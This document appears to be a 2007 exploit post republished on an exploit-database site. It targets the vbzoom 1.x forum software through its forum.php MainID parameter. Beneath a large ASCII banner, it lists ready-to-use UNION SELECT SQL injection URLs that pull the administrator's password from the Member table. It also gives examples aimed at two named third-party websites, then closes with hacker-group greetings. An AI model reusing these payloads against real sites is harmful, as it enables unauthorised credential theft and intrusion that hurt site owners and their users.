vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerability

🗓️ 02 Jul 2007 00:00:00Reported by Cold ZeroType

zdt🔗 0day.today👁 51 Views

vbzoom 1.x Remote SQL Injection Vulnerabilit

================================================================
vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerability
================================================================


--/ Long Life Palestine  --

     HHHHHH  HHHHHH HH      HHHHHH  HHHHHH HHHHHHHH  HHHH HH    HH HHHHHH
     HH   HH HH  HH HH      HHHHH  HH         HH      HH  HHH   HH HHHHH
     HH   HH HH  HH HH      HH     HH         HH      HH  HHHH  HH HH
     HHHHHH  HHHHHH HH      HHHHH   HHHHHH    HH      HH  HH HH HH HHHHHH
     HH      HH  HH HH      HH           HH   HH      HH  HH  HHHH HH
     HH      HH  HH HH      HHHHH        HH   HH      HH  HH   HHH HHHHH
     HH      HH  HH HHHHHHH HHHHHH  HHHHHH    HH     HHHH HH    HH HHHHHH

                 HH  HH HHHHHH HHHHHH HH   HH HHHHHH HHHHHH
                 HH  HH HH  HH HHHHHH HH  HH  HHHHH  HHH HHH
                 HH  HH HH  HH HH     HH HH   HH     HH  HH
                 HHHHHH HHHHHH HH     HHHH    HHHHHH HHHHH
                 HH  HH HH  HH HH     HH HH   HH     HH  HH
                 HH  HH HH  HH HHHHHH HH  HH  HHHHH  HH   HH
                 HH  HH HH  HH HHHHHH HH   HH HHHHHH HH    HH
--/ Long Life Palestine  --

vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerabilities

Found By : Cold z3ro 

For user :
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,usertitle,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1/*
Or
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,usertitle,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1/*

For Password : 
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1/*
Or
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1/*

Example :
http://1yemen.com/vb//forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1/*

http://www.vz.elagha.net//forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1/*


-----------
Thx For : RomancyxHacker , Mogatil , Abo0oD , Mohandko , The Wolf Ksa , Root-Shell ,          Viper Hacker , By_3mry , All Friends



#  0day.today [2018-03-28]  #

02 Jul 2007 00:00Current

7.1High risk

Vulners AI Score7.1